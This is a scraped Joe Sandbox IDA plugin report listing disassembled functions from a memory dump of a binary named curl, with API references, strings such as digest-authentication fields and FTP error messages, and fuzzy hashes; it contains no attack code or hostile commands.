Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_slist_appendstrncpy$FreeLibraryStartupcurl_msnprintfcurl_slist_free_allsscanf
String ID: %127[^= ]%*[ =]%255s$TTYPE$XDISPLOC
API String ID: 1588789521-249684573
Opcode ID: a4d40eafa14b0cb73ae27e06210848088ad11ba9a6e355a90301c67168bd9de2
Instruction ID: b10c6d51f1c7564f21699a04348043122727e423a4c16d5b8f1dd139edc9b0ee
Opcode Fuzzy Hash: a4d40eafa14b0cb73ae27e06210848088ad11ba9a6e355a90301c67168bd9de2
Instruction Fuzzy Hash: 7941E374A053059FD710DF15C488BDABBF4FF48344F0486AAE8888B312E7B9A985CF85

Function 00446020 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 69stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0044603B

Part of subcall function 00443230: strlen.MSVCRT ref: 00443252

Part of subcall function 00445C10: strstr.MSVCRT ref: 00445C2C
Part of subcall function 00445C10: strlen.MSVCRT ref: 00445C3A

Strings

nonce=", xrefs: 00446080
algorithm=, xrefs: 004460D9
realm=", xrefs: 004460B4
,, xrefs: 004460E2

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strlen$strstr
String ID: ,$algorithm=$nonce="$realm="
API String ID: 1237951486-827410790
Opcode ID: d3a66883ad904eee0afab573572405add1fb9d3cda1007cbc411e5353bdc5389
Instruction ID: 5a1a4e496b1e8cbd1b2e7af36af693eb5c797b80bccbddfac54919d8c25d6718
Opcode Fuzzy Hash: d3a66883ad904eee0afab573572405add1fb9d3cda1007cbc411e5353bdc5389
Instruction Fuzzy Hash: 6D21E2B42083419FE710EF25D58471BBBE5AF95381F01982EE9C587352E739E888CB57

Function 00406209 Relevance: 7.6, APIs: 5, Instructions: 63stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0040621A
strpbrk.MSVCRT ref: 0040623B
malloc.MSVCRT ref: 0040624E
strcspn.MSVCRT ref: 00406292
strncpy.MSVCRT ref: 004062A8
isalpha.MSVCRT ref: 00406334
_strdup.MSVCRT ref: 004064C1
free.MSVCRT ref: 004064D7
free.MSVCRT ref: 004064F7
_strdup.MSVCRT ref: 0040653E

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: _strdupfree$isalphamallocstrcspnstrlenstrncpystrpbrk
String ID:
API String ID: 980764032-0
Opcode ID: ed4f1f0147cf421b5932551cff2ee5898a1dc9ebeae700b4fdbc4bcb7b7c598a
Instruction ID: 16d8af39d93f3e0b0dd4d90844d043c000e51f39e55f9b8a15553473156800b6
Opcode Fuzzy Hash: ed4f1f0147cf421b5932551cff2ee5898a1dc9ebeae700b4fdbc4bcb7b7c598a
Instruction Fuzzy Hash: 7E216D70A083858FC7209F6A854036AFBE1AF86345F0A483FDCD997352E77CD8558B5A

Function 00403290 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 004032B6
SearchPathA.KERNEL32 ref: 004032F2
free.MSVCRT ref: 0040330F
_strdup.MSVCRT ref: 00403324
free.MSVCRT ref: 0040333B

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: free$PathSearch_strdupmalloc
String ID:
API String ID: 3194555913-0
Opcode ID: b9e671d5a5124ef2a4965cd31d32bf1b98915f17acb774d550a1cbbc9a70d303
Instruction ID: 893e03d54a7de102a152e85ed9778ba0f7d76706680309b2c92b4514ef26bb35
Opcode Fuzzy Hash: b9e671d5a5124ef2a4965cd31d32bf1b98915f17acb774d550a1cbbc9a70d303
Instruction Fuzzy Hash: DA112B706043059FD700EF69C88479FBFE4AF05355F40846EEC889B381DB79D5448B95

Function 00416D50 Relevance: 7.6, APIs: 5, Instructions: 53networkCOMMON

Download Yara Rule

APIs

curl_msnprintf.CURL ref: 00416D79

Part of subcall function 0040F070: curl_mvsnprintf.CURL ref: 0040F092

Part of subcall function 004250A0: getaddrinfo.WS2_32 ref: 004250CD
Part of subcall function 004250A0: memcpy.MSVCRT ref: 0042519B
Part of subcall function 004250A0: freeaddrinfo.WS2_32 ref: 004251ED

EnterCriticalSection.KERNEL32 ref: 00416DA6
LeaveCriticalSection.KERNEL32 ref: 00416DBB
WSAGetLastError.WS2_32 ref: 00416DD6
WSAGetLastError.WS2_32 ref: 00416DE1

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: CriticalErrorLastSection$EnterLeavecurl_msnprintfcurl_mvsnprintffreeaddrinfogetaddrinfomemcpy
String ID:
API String ID: 3880883023-0
Opcode ID: 802b3762f86dec6fa31f931a7faa38b2493198c6e3911fe5f778375c235de212
Instruction ID: fcb13105b11aff2ef28a3aab32107990afd76b6ed46dec370f7fcd196639a1c0
Opcode Fuzzy Hash: 802b3762f86dec6fa31f931a7faa38b2493198c6e3911fe5f778375c235de212
Instruction Fuzzy Hash: 7E112BB1A04304DFDB00EF35D88858ABBE4EF88754F01857AE948CB215E774D844CB96

Function 004032A0 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 004032B6
SearchPathA.KERNEL32 ref: 004032F2
free.MSVCRT ref: 0040330F
_strdup.MSVCRT ref: 00403324
free.MSVCRT ref: 0040333B

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: free$PathSearch_strdupmalloc
String ID:
API String ID: 3194555913-0
Opcode ID: c762e026edcc12f30eec05d862f87116c6c4eaf7b6c5207347b48219bb37f47d
Instruction ID: 4d1d2e6331108a3a2a6954551abbb4620f4a5cb3a0591dd7756e3beef584ce6a
Opcode Fuzzy Hash: c762e026edcc12f30eec05d862f87116c6c4eaf7b6c5207347b48219bb37f47d
Instruction Fuzzy Hash: 2C1106705083089FD700AF69C88479FBBE8AB05355F05846EEC889B381DB799A448B96

Function 00403360 Relevance: 7.5, APIs: 5, Instructions: 23COMMON

Download Yara Rule

APIs

curl_slist_free_all.CURL(?,?,?,?,?,?,0040340C), ref: 0040336B
curl_slist_free_all.CURL(?,?,?,?,?,?,0040340C), ref: 00403382
curl_slist_free_all.CURL(?,?,?,?,?,?,0040340C), ref: 00403399
curl_slist_free_all.CURL(?,?,?,?,?,?,0040340C), ref: 004033B0
curl_slist_free_all.CURL(?,?,?,?,?,?,0040340C), ref: 004033C7

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_slist_free_all
String ID:
API String ID: 2048950981-0
Opcode ID: 561e89a48796ab2157a706562cedea24a71bc3bd0447a7756a044cb20fa55403
Instruction ID: 8f354d787aec53b0962da6241a4fa9ee768cb7c319f88973637e845460445e4e
Opcode Fuzzy Hash: 561e89a48796ab2157a706562cedea24a71bc3bd0447a7756a044cb20fa55403
Instruction Fuzzy Hash: 9BF092B8800B408BE700EF39E88531A7BE5E70030AFC5092DD8584F362D7B844C4CB89

Function 00404050 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00404074
curl_strnequal.CURL ref: 004040E2

Strings

RE, xrefs: 0040409A
no-, xrefs: 0040406D

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_strnequalstrlen
String ID: RE$no-
API String ID: 991165234-585763755
Opcode ID: 4eb097d51729adfaba846e9736960f04d3288fb31e2836331405edcbab9e5233
Instruction ID: 9eab17634e77c3bfe0320901c3a676b0a78f0efe4c8456955175b830808f5ea4
Opcode Fuzzy Hash: 4eb097d51729adfaba846e9736960f04d3288fb31e2836331405edcbab9e5233
Instruction Fuzzy Hash: B9516DB16083408BD7208F15C48471BBBE4FBD5318F594A7EEA88AB3D1D379D984CB4A

Function 0042D700 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 123networkCOMMON

Download Yara Rule

APIs

WSAGetLastError.WS2_32 ref: 0042D830

Strings

FTP response aborted due to select/poll error: %d, xrefs: 0042D836
We got a 421 - timeout!, xrefs: 0042D864
FTP response timeout, xrefs: 0042D8B8

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: ErrorLast
String ID: FTP response aborted due to select/poll error: %d$FTP response timeout$We got a 421 - timeout!
API String ID: 1452528299-2064316097
Opcode ID: 0e6e4f9280e54d9a401da4f981462a5450d413523c2a8fa63f6e821326e02c18
Instruction ID: fa1cfd8362650a663f4a5428d4bea9b0fa370c7e99e6e5fe3831b9d08a9981d5
Opcode Fuzzy Hash: 0e6e4f9280e54d9a401da4f981462a5450d413523c2a8fa63f6e821326e02c18
Instruction Fuzzy Hash: 87414CB0A083118FD710EF29E48465BB7E4EFC4358F54892EE8988B351E739D945CB96

Function 00445E70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00445E89
strlen.MSVCRT ref: 00445E93
curl_maprintf.CURL ref: 00445F75

Strings

%s %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x, xrefs: 00445F6E

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strlen$curl_maprintf
String ID: %s %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x
API String ID: 647016589-3654824481
Opcode ID: ef1a71664205807c75cdb0c6f12a5929b537a3f230adea112059f7caae70020f
Instruction ID: 8ffeca939ded0cc08183ddb4fda576b9c22db05c4451e8b5fda52dc62712199b
Opcode Fuzzy Hash: ef1a71664205807c75cdb0c6f12a5929b537a3f230adea112059f7caae70020f
Instruction Fuzzy Hash: FB41B0B490C7908ED361AF7A808022FFFE0AA89755F048D6EF8D4C2352E678C9459B57

Function 00444670 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94stringCOMMON

Download Yara Rule

APIs

curl_maprintf.CURL(?,?,?,?,?,?,?,?,?,?,?,00000002,74D656E0,?,004447DF), ref: 0044468D
curl_mvaprintf.CURL(?,?,?,?,?,?,?,?,?,?,?,00000002,74D656E0,?,004447DF), ref: 004446A7
strlen.MSVCRT ref: 004446CA

Part of subcall function 00421080: GetTickCount.KERNEL32 ref: 00421084

Strings

%s, xrefs: 00444686

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: CountTickcurl_maprintfcurl_mvaprintfstrlen
String ID: %s
API String ID: 497045687-3043279178
Opcode ID: ef5a93d557b74ee879ff64dbffd872a5a3b073eb6b32c031c675afd82f21aa9a
Instruction ID: e10964c96fff6ba76defd00c5b44680495ebfe61a62cb71fa824767acc1b2ffe
Opcode Fuzzy Hash: ef5a93d557b74ee879ff64dbffd872a5a3b073eb6b32c031c675afd82f21aa9a
Instruction Fuzzy Hash: 5B41D4B49087008FD700EF69D48475ABBE4FF88745F11896EE8888B316E778D945CF96

Function 00432AE0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

curl_easy_unescape.CURL ref: 00432B10
_open.MSVCRT ref: 00432B6D

Strings

Couldn't open file %s, xrefs: 00432BA3
%, xrefs: 00432BC3

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: _opencurl_easy_unescape
String ID: %$Couldn't open file %s
API String ID: 896256270-1694082829
Opcode ID: 9bddde4fc8c2ddf2670d144403804f06b799c3073197473deaf0e0607140b0fa
Instruction ID: 166be0a839938505e8290587e26bb377017124b667448e73afbc4f822aa979dd
Opcode Fuzzy Hash: 9bddde4fc8c2ddf2670d144403804f06b799c3073197473deaf0e0607140b0fa
Instruction Fuzzy Hash: B231F1702087459FD7108F19C19476BFBE1AF89354F148A6EE8C88F342D3BEA844CB56

Function 0042BEF0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 85networkCOMMON

Download Yara Rule

APIs

getsockname.WS2_32 ref: 0042BF33
accept.WS2_32 ref: 0042BF8A

Part of subcall function 00414FF0: closesocket.WS2_32(?), ref: 00415028

Part of subcall function 004166C0: curl_mvsnprintf.CURL(?,?,?,?,?,?,?,?,0041AB91), ref: 004166EA
Part of subcall function 004166C0: strlen.MSVCRT ref: 00416710

Strings

Connection accepted from server, xrefs: 0042BFAC
Error accept()ing server connect, xrefs: 0042BF5B

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: acceptclosesocketcurl_mvsnprintfgetsocknamestrlen
String ID: Connection accepted from server$Error accept()ing server connect
API String ID: 3857669862-2331703088
Opcode ID: cdee4a47d8148f2ae872c3a0a363e45d9b070b4fd2927fe76b14c02dfa0763ae
Instruction ID: cfec3f7570f51d84521a9ab22ce47cd34c93d4bcf303aa4f4f5b876ed9038b25
Opcode Fuzzy Hash: cdee4a47d8148f2ae872c3a0a363e45d9b070b4fd2927fe76b14c02dfa0763ae
Instruction Fuzzy Hash: CF3155B1A047049FD710AF29E88439EFBF0EF84318F0184AEE89C87351D73499848F96

Function 0041601C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 78networkCOMMON

Download Yara Rule

APIs

Part of subcall function 004148C0: SleepEx.KERNELBASE ref: 004148E9
Part of subcall function 004148C0: getsockopt.WS2_32 ref: 00414913

WSASetLastError.WS2_32 ref: 00415E4D

Part of subcall function 00413810: GetLastError.KERNEL32 ref: 00413822
Part of subcall function 00413810: strrchr.MSVCRT ref: 00413941
Part of subcall function 00413810: strrchr.MSVCRT ref: 00413961
Part of subcall function 00413810: GetLastError.KERNEL32 ref: 00413975
Part of subcall function 00413810: SetLastError.KERNEL32 ref: 00413981
Part of subcall function 00413810: FormatMessageA.KERNEL32 ref: 00413B3C
Part of subcall function 00413810: curl_msnprintf.CURL ref: 00413B68

Part of subcall function 00416640: curl_mvsnprintf.CURL ref: 00416682
Part of subcall function 00416640: strlen.MSVCRT ref: 0041668A

Strings

., xrefs: 00415E59
connect to %s port %ld failed: %s, xrefs: 00415E8F
Failed to connect to %s port %ld: %s, xrefs: 00415F25

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: ErrorLast$strrchr$FormatMessageSleepcurl_msnprintfcurl_mvsnprintfgetsockoptstrlen
String ID: .$Failed to connect to %s port %ld: %s$connect to %s port %ld failed: %s
API String ID: 190426359-3197281966
Opcode ID: 7ea0a159af4b7c6e2c063ef885348f7a56293e30f4e74f54a052137489abbec0
Instruction ID: 8d0e796e5f94b25c4c71a476d35c5a9b661cb62929a18c1be3ca52505735f762
Opcode Fuzzy Hash: 7ea0a159af4b7c6e2c063ef885348f7a56293e30f4e74f54a052137489abbec0
Instruction Fuzzy Hash: 493192B5A04704DFCB10DFA9C48469EBBF1BF84314F15882EE8999B305D738E949CB46

Function 00436229 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

curl_strnequal.CURL ref: 004361B1
curl_strnequal.CURL ref: 004361ED
curl_strnequal.CURL ref: 00436255
curl_strnequal.CURL ref: 004362AA

Strings

AUTH, xrefs: 004361A6, 004361E2

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_strnequal
String ID: AUTH
API String ID: 482932555-3461045741
Opcode ID: 07f8791283c6bb4b2238b13a7d411d30321430b2e95a7e17a9eed183962de36f
Instruction ID: 16964606a86ca2c59b780d50fec109f6d9320e23834d42a526f54ef38ab6306d
Opcode Fuzzy Hash: 07f8791283c6bb4b2238b13a7d411d30321430b2e95a7e17a9eed183962de36f
Instruction Fuzzy Hash: 5B21D0B04083436ACB10AF25850036BBBD15F48344F17D94EE9D88B386E77CD946CB4E

Function 00438529 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

curl_strnequal.CURL ref: 004384B1
curl_strnequal.CURL ref: 004384ED
curl_strnequal.CURL ref: 00438555
curl_strnequal.CURL ref: 004385AA

Strings

AUTH, xrefs: 004384A6, 004384E2

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
